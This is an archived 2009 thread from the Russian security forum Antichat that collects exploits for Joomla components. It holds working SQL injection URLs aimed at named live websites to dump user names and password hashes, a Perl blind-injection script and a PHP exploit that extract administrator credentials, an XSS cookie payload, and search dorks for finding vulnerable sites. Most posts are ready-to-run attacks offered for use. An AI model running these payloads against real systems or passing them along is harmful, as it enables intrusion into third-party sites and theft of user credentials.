ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
30.06.2009, 17:11
|
|
Постоянный
Регистрация: 12.12.2006
Сообщений: 906
Провел на форуме:
4205500
Репутация:
930
|
|
com_svmap
Вот наткнулся случайно. Может кто доведет до ума, если, конечно, есть что доводить.
Код:
www.allegra.as/index.php?option=com_svmap&id=-1&user_id=1&type=1&Itemid=2
|
|
|
30.06.2009, 17:52
|
|
Познающий
Регистрация: 04.01.2009
Сообщений: 94
Провел на форуме:
404716
Репутация:
145
|
|
Сообщение от Fata1ex
com_svmap
Вот наткнулся случайно. Может кто доведет до ума, если, конечно, есть что доводить.
Код:
www.allegra.as/index.php?option=com_svmap&id=-1&user_id=1&type=1&Itemid=2
если не ошибаюсь это не дыра
просто ошибка в обработке данных
|
|
|
|
SQL-Injection в компоненте doQment под joomla |
08.07.2009, 15:50
|
|
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
Провел на форуме:
1585404
Репутация:
564
|
|
SQL-Injection в компоненте doQment под joomla
SQL-Injection в компоненте doQment под joomla
Vulnerability : уязвимый параметр cid=
Example:
Код:
http://www.agmodena.it/index.php?option=com_doqment&cid=-11/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7,8/**/from/**/jos_users/**/where/**/usertype=CHAR(83,117,112,101,114,32,65,100,109,105 ,110,105,115,116,114,97,116,111,114)#&Itemid=92
Dork: inurl:com_doqment + cid=
# shell_c0de
Последний раз редактировалось shell_c0de; 08.07.2009 в 15:53..
|
|
|
|
28.07.2009, 17:48
|
|
Постоянный
Регистрация: 15.03.2009
Сообщений: 435
Провел на форуме:
4061203
Репутация:
704
|
|
Joomla Almond Classifieds Component SQL Injection and Cross-Site Scripting
Description:
Moudi has reported some vulnerabilities in the Almond Classifieds component for Joomla, which can be exploited by malicious people to conduct SQL injection and cross-site scripting attacks.
1) Input passed via the "replid" to index.php (when "option" is set to "com_aclassf", "Itemid" is set to a valid id, "ct" to "manw_repl" and "md" is set to "add_form") is not properly sanitised before being used in an SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
2) Input passed via the "addr" parameter to components/com_aclassf/gmap.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.
The vulnerabilities are reported in version 7.5. Other versions may also be affected.
Код:
###########################################################################
#-----------------------------I AM MUSLIM !!------------------------------#
###########################################################################
==============================================================================
_ _ _ _ _ _
/ \ | | | | / \ | | | |
/ _ \ | | | | / _ \ | |_| |
/ ___ \ | |___ | |___ /___ \ | _ |
IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_|
==============================================================================
[�] [!] Coder - Developer HTML / CSS / PHP / Vb6 . [!]
==============================================================================
[�] Joomla Component v.7.5 (com_aclassf) Multiple Remote Vulnerabilities
==============================================================================
[�] Script: [ Joomla Almond Classifieds v.7.5 ]
[�] Language: [ PHP ]
[�] Download: [ http://www.almondsoft.com ]
[�] Founder: [ Moudi <m0udi@9.cn> ]
[�] Thanks to: [ MiZoZ , ZuKa , str0ke , 599em Man , Security-Shell ...]
[�] Team: [ EvilWay ]
[�] Dork: [ OFF ]
[�] Price: [ $195 ]
[�] Site : [ https://security-shell.ws/forum.php ]
###########################################################################
===[ Exploit + LIVE : BLIND SQL INJECTION vulnerability ]===
[�] http://www.site.com/patch/index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=[BLIND]
[�] http://www.almondsoft.com/j/index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=11438 and 1=1 <= TRUE
[�] http://www.almondsoft.com/j/index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=11438 and 1=2 <= FALSE
[�] http://www.almondsoft.com/j/index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=11438+AND SUBSTRING(@@version,1,1)=5
=> TRUE
[�] http://www.almondsoft.com/j/index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=11438+AND SUBSTRING(@@version,1,1)=5
=> FALSE
===[ Exploit XSS + LIVE : vulnerability ]===
[�] http://www.site.com/patch/components/com_aclassf/gmap.php?addr=[XSS]
[�] http://www.almondsoft.com/j/components/com_aclassf/gmap.php?addr="><script>alert(document.cookie);</script>
Author: Moudi
###########################################################################
|
|
|
|
Joomla component com_fireboard SQL-inj |
29.07.2009, 14:55
|
|
Участник форума
Регистрация: 17.05.2008
Сообщений: 102
Провел на форуме:
1054394
Репутация:
74
|
|
Joomla component com_fireboard SQL-inj
Joomla component com_fireboard SQL-inj
Уязвимый параметр func
Код:
?func=who',%20userid=123,%20link=(SELECT %20jos_users.password%20FROM%20jos_users%20WHERE%20jos_users.id=123)%20--%20a
Более подробно смотрим сюда
http://forum.antichat.ru/threadnav130926-1-10.html
и вот сюда
http://forum.antichat.ru/showpost.php?p=1409117&postcount=33
|
|
|
|
02.08.2009, 10:57
|
|
Постоянный
Регистрация: 16.02.2008
Сообщений: 395
Провел на форуме:
3370466
Репутация:
96
|
|
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++ Joomla Component com_jfusion (Itemid) Blind SQL-injection Vulnerability
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++
################################################## #
[+] Author : Chip D3 Bi0s
[+] Email : chipdebios[alt+64]gmail.com
[+] Vulnerability : Blind SQL injection
################################################## #
Example:
Код:
http://localHost/path/index.php?option=com_jfusion&Itemid=n[Sql Code] n:valid Itemid
Sql code:
Код:
+and+(select+substring(concat(1,password),1,1)+from+jos_users+limit+0,1)=1/*
etc, etc...
DEMO LIVE:
Код:
http://www.cd7.com.ec/index.php?option=com_jfusion&Itemid=66+and+(select+substring(concat(1,username),1,1)+from+jos_users+limit+0,1)=1
Код:
http://www.cd7.com.ec/index.php?option=com_jfusion&Itemid=66+and+ascii(substring((SELECT+concat(password,0x3a,username)+from+jos_users+limit+0,1),1,1))=97 !False ¡¡¡¡
Код:
http://www.cd7.com.ec/index.php?option=com_jfusion&Itemid=66+and+ascii(substring((SELECT+concat(password,0x3a,username)+from+jos_users+limit+0,1),1,1))=98 ¡True ¡¡¡¡
etc, etc...
# milw0rm.com [2009-08-01]
Последний раз редактировалось swt1; 02.08.2009 в 11:01..
|
|
|
|
02.08.2009, 10:58
|
|
Постоянный
Регистрация: 16.02.2008
Сообщений: 395
Провел на форуме:
3370466
Репутация:
96
|
|
http://wwww.host.org/Path : http://www.cd7.com.ec/
[-] Introduce Itemid : 66
[-] Introduce coincidencia : http://www.cd7.com.ec/forum/
+++++++++++++++++++++++++++++++++++++++
#[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++
PHP код:
#!/usr/bin/perl -w use LWP::UserAgent; use Benchmark; my $t1 = new Benchmark; print "\t\t-------------------------------------------------------------\n\n"; print "\t\t | Chip d3 Bi0s | \n\n"; print "\t\t Joomla Component com_jfusion (Itemid) Blind SQL-injection \n\n"; print "\t\t-------------------------------------------------------------\n\n"; print "http://wwww.host.org/Path : ";chomp(my $target=<STDIN>); print " [-] Introduce Itemid : ";chomp($z=<STDIN>); print " [-] Introduce coincidencia : ";chomp($w=<STDIN>); $column_name="concat(password)"; $table_name="jos_users"; $b = LWP::UserAgent->new() or die "Could not initialize browser\n"; $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); print "----------------Inyectando----------------\n"; #es Vulnerable? $host = $target . "/index.php?option=com_jfusion&Itemid=".$z."+and+1=1"; my $res = $b->request(HTTP::Request->new(GET=>$host)); my $content = $res->content; my $regexp = $w; if ($content =~ /$regexp/) { $host = $target . "/index.php?option=com_jfusion&Itemid=".$z."+and+1=2"; my $res = $b->request(HTTP::Request->new(GET=>$host)); my $content = $res->content; my $regexp = $w; if ($content =~ /$regexp/) {print " [-] Exploit Fallo :(\n";} else {print " [-] Vulnerable :)\n"; for ($x=1;$x<=32;$x++) { $host = $target . "/index.php?option=com_jfusion&Itemid=".$z."+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+limit+0,1),".$x.",1))>57"; my $res = $b->request(HTTP::Request->new(GET=>$host)); my $content = $res->content; my $regexp = $w; print " [!] ";if($x <= 9 ) {print "0$x";}else{print $x;}#para alininear 0..9 con los 10-32 if ($content =~ /$regexp/) { for ($c=97;$c<=102;$c++) { $host = $target . "/index.php?option=com_jfusion&Itemid=".$z."+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+limit+0,1),".$x.",1))=".$c." "; my $res = $b->request(HTTP::Request->new(GET=>$host)); my $content = $res->content; my $regexp = $w; if ($content =~ /$regexp/) {$char=chr($c); $caracter[$x-1]=chr($c); print "-Caracter: $char\n"; $c=102;} } } else { for ($c=48;$c<=57;$c++) { $host = $target . "/index.php?option=com_jfusion&Itemid=".$z."+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+limit+0,1),".$x.",1))=".$c." "; my $res = $b->request(HTTP::Request->new(GET=>$host)); my $content = $res->content; my $regexp = $w; if ($content =~ /$regexp/) {$char=chr($c); $caracter[$x-1]=chr($c); print "-Caracter: $char\n"; $c=57;} } } } print " [+] Password :"." ".join('', @caracter) . "\n"; my $t2 = new Benchmark; my $tt = timediff($t2, $t1); print "El script tomo:",timestr($tt),"\n"; } } else {print " [-] Exploit Fallo :(\n";}
# milw0rm.com [2009-08-01]
Последний раз редактировалось swt1; 02.08.2009 в 11:25..
|
|
|
|
08.08.2009, 12:19
|
|
Постоянный
Регистрация: 16.02.2008
Сообщений: 395
Провел на форуме:
3370466
Репутация:
96
|
|
Joomla Component com_pms 2.0.4 (Ignore-List) SQL Injection Exploit
PHP код:
<?php
/*
--------------------------
Joomla <=1.0.15 Component com_pms <=2.0.4 (Ignore-List) SQl-Injection Vuln
--------------------------
Author: M4dhead
Vulnerable joomla component : com_pms
Conditions : magic_quotes_gpc = On or Off it doesn't matter ;)
--------------------------
PREPARATION:
--------------------------
You need a valid Account on the Joomla 1.0.15 Site + Community Builder Suite 1.1.0:
Community Builder Suite 1.1.0:
http://www.joomlaos.de/option,com_remository/Itemid,41/func,finishdown/id,1175.html
PMS enhanced Version 2.0.4 J 1.0
http://www.make-website.de/script-downlaods?task=summary&cid=123&catid=214
Install Joomla 1.0.15
Install Community Builder
Install PMS Enhanced
Activate the Ignorlist in Components->PMS Enhanced->Config
Tab: Backend -> Ingorlist: Yes
Create a valid User on the target Joomla 1.0.15 System with Community Builder,
login and copy the cookieinformation into the $cookie var below,
adjust the User-Agent on your Post Header dependent on your Browser.
Notice: Pay attention on your User-Agent in the POST Header, it have to be the same as you have logged in,
because the cookie-name is dependent on your browser.
--------------------------
USAGE:
--------------------------
Run this script! If there's not shown a page that prompt you to login, the attack was successful.
Then go to the ignore list: www.yourtargetsite.com/index.php?option=com_pms&Itemid=&page=ignore
and you will see some username and passwords in the selectbox :-)
Have fun!!
----------------------------------------------------
*/
$host = "localhost"; //your target Joomla Site
$cookie = "290cd01070fed63ac53f84f5c91d2bd9=a5846a8c64962e14367d5c7298f6c72c"; //replace this with your own cookie values
$useragent = "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.0.13) Gecko/2009073022 Firefox/3.0.13\r\n";
//NOTICE: Pay attention on your User-Agent in the POST Header, it have to be the same as you have logged in,
//because the cookie-name is dependent on your browser.
//Don't change anything below
$path = "/joomla/index.php?option=com_pms&Itemid=&page=ignore"; //dont change this
$data_to_send = "no_entry=keine+Eintr%E4ge&save=Ignorliste+speichern&filter_site_users=alle&ignore_ids=|63, 111 ) AND 1=2 UNION SELECT 1,concat(username,char(0x3a), password),3 from jos_users -- /* |"; //you don't have to change this
print_r($post = PostToHost($host, $path, $cookie, $data_to_send, $useragent));
function PostToHost($host, $path, $cookie, $data_to_send, $useragent) {
$fp = fsockopen($host, 80);
fputs($fp, "POST $path HTTP/1.1\r\n");
fputs($fp, "Host: $host\r\n");
fputs($fp, "User-Agent: $useragent");
fputs($fp, "Cookie: $cookie\r\n");
fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n");
fputs($fp, "Content-length: ". strlen($data_to_send) ."\r\n");
fputs($fp, "Connection: close\r\n\r\n");
fputs($fp, $data_to_send);
while(!feof($fp)) {
$res .= fgets($fp, 128);
}
fclose($fp);
return $res;
}
?>
# milw0rm.com [2009-08-07]
|
|
|
|
10.08.2009, 12:04
|
|
Познающий
Регистрация: 17.09.2008
Сообщений: 56
Провел на форуме:
587324
Репутация:
40
|
|
COM_SOBI2
COM_SOBI2
SQL INJECTION
http://www.sigsiu.net/download/components/sigsiu_online_business_index_2_for_joomla_1.0.x.ht ml
Проверял только на Joomla_1.0.x
Код:
index.php?option=com_sobi2&sobi2Task=search&Itemid=26
benchmark
в поле поиск вводить
Код:
')and+benchmark(10000000,benchmark(10000000,md5(now())))# a
Обязательно удалить все пробелы
и нажимать поиск)
Последний раз редактировалось FAQ666; 10.08.2009 в 13:28..
|
|
|
|
Уязвимости компонентов Joomla/Mambo |
10.09.2009, 04:10
|
|
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684
Репутация:
3908
|
|
Уязвимости компонентов Joomla/Mambo
Уязвимость: SQL-Inj
Компонент: The Publications
Уязвимость в файле publications.php
Уязвимый код:
PHP код:
$query = "SELECT * FROM #__content WHERE catid=$id ORDER BY title DESC";
Пример:
Код:
http://www.bscic.gov.bd/index.php?option=com_publications&Itemid=20&lang=en&id=6/**/and/**/1=0/**/union/**/select/**/1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11,12,13,14+from+jos_users--
__________________
Feci, quod potui. Faciant meliora potentes.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид